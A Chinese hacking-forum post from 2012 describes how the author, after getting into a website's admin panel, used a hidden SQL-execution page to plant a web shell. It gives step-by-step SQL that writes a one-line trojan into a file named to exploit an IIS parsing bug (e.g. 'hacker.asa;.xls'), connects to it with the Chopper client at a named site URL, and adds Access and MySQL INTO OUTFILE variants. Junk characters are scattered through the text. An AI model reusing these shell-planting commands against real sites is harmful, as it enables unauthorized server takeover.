好不容易进了后台,发现啥上传啊。备份啊多木有。' U5 [+ [0 k9 R# z, C* }
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的6 A7 t# X2 `7 e! I
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,9 G" ]8 X7 T, V# t% U; w
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:0 e/ z2 `4 \! u) k9 o9 b
1.create table cmd (a varchar(50))
6 E. U2 j1 ?$ u9 _# b% j& O2.insert into cmd (a) values (‘‘)4 @. S; l" Y9 A( [. t
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd' o6 D2 _4 K C: |/ ^+ M
(把表cmd的内容导出为物理路径的一个EXCEL文件)% L2 W; M5 {, p
4.drop table cmd
/ F! ^! J2 C1 ~8 N; h利用IIS的BUG成功拿到了WEBSHELL。
6 C# P5 C( E! n' ?7 e3 \) L
5 T6 T" b/ Z1 T U7 m, {9 a. x$ D直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话0 l. N5 O% l3 ~* B' r
! H$ |" X3 z& W! y7 m; @
SQL语句意思解释:$ \) c/ G5 L( v7 }( B
第一句# N+ `- d! x' R! r5 {
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50+ S! o4 w7 b" f5 T6 _- Q
9 F! {# E Z( ]; z2 Z 第二句
* p! |* P# J- F 在表cmd的a字段插入一句话木马 t2 v! l5 f2 V) t5 E2 T
第三句
7 E1 C% J0 }/ e0 ^8 A: h) ~ ~7 i 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
- K+ k( `6 @/ Z
8 ]" v7 j) x7 O ~! h" ~ 第四句+ T. R4 R3 u! t9 h4 w+ M; L
删除建立的cmd表
, l0 X! j. Q& \0 V$ m0 f+ z7 @& `2 {
% u1 a3 @+ h; r- s9 h- M# R. Z 以下内容为测试:
$ h* @" o, `8 p" B0 F2 _ Access利用后台SQL执行命令功能导出WebShell:( H% T4 T1 x0 s+ I6 X) L; y4 D6 R
这个更简单:$ S# E/ t. P5 W& I! |# a: u4 ^
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]9 F; K6 M9 ?7 B; T
或者9 v5 b1 t$ s" R% b8 @2 c
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]& F y) b: Y8 S
* d4 o0 j6 Y1 u( q% E- l- i$ ?
后台有执行SQL语句功能(vote为已知表段)& B, C* H: p; l! N) y( x* W
希望对大家有所帮助拿shell的又一个思路0 N: ^2 D C! o; i8 {6 w! U
|
发表于 2012-9-13 17:53:58
收藏
支持
反对